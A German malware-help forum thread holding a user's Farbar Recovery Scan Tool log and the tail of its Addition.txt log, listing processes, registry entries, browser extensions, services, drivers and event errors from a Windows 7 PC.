Description: {9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "CyberGhost 5 Client Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Apple Mobile Device" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (09/29/2015 09:40:56 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


CodeIntegrity:
===================================
  Date: 2015-09-21 18:26:06.410
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2015-09-21 18:26:06.394
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2015-09-09 00:48:00.156
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.111
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.054
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:48:00.010
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.933
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.879
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.840
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.785
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+
Prozentuale Nutzung des RAM: 77%
Installierter physikalischer RAM: 4094.49 MB
Verfügbarer physikalischer RAM: 919.03 MB
Summe virtueller Speicher: 8187.18 MB
Verfügbarer virtueller Speicher: 5142.03 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:186.31 GB) (Free:75.85 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:482.62 GB) NTFS
Drive e: (OFFICE12) (CDROM) (Total:0.56 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D)
Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C)
Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         

Alt 29.09.2015, 14:16   #15
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



FRST
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015
durchgeführt von Kenny G (Administrator) auf KENNYG-PC (29-09-2015 09:47:21)
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 8 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [GrooveMonitor] => D:\Wuala\microsoft office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-09-23] (Microsoft Corporation)
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> D:\Wuala\microsoft office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Handler-x32: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - D:\Wuala\microsoft office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08]
FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com

Chrome: 
=======
CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16]
CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16]
CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16]
CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15]
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03]
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03]
CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27]
CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03]
CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03]
CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03]
CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url>

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
S3 Microsoft Office Groove Audit Service; D:\Wuala\microsoft office\Office12\GrooveAuditService.exe [65824 2006-10-27] (Microsoft Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] ()
S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X]
S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation)
R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-28 23:12 - 2015-09-28 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Works
2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files\Microsoft Office
2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
2015-09-28 18:12 - 2015-09-28 18:12 - 02870984 _____ (ESET) C:\Users\Kenny G\Downloads\esetsmartinstaller_deu.exe
2015-09-27 20:55 - 2014-05-14 18:23 - 02477536 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-09-27 20:55 - 2014-05-14 18:23 - 00700384 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-09-27 20:55 - 2014-05-14 18:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-09-27 20:55 - 2014-05-14 18:23 - 00058336 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-09-27 20:55 - 2014-05-14 18:23 - 00044512 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-09-27 20:55 - 2014-05-14 18:23 - 00038880 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-09-27 20:55 - 2014-05-14 18:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
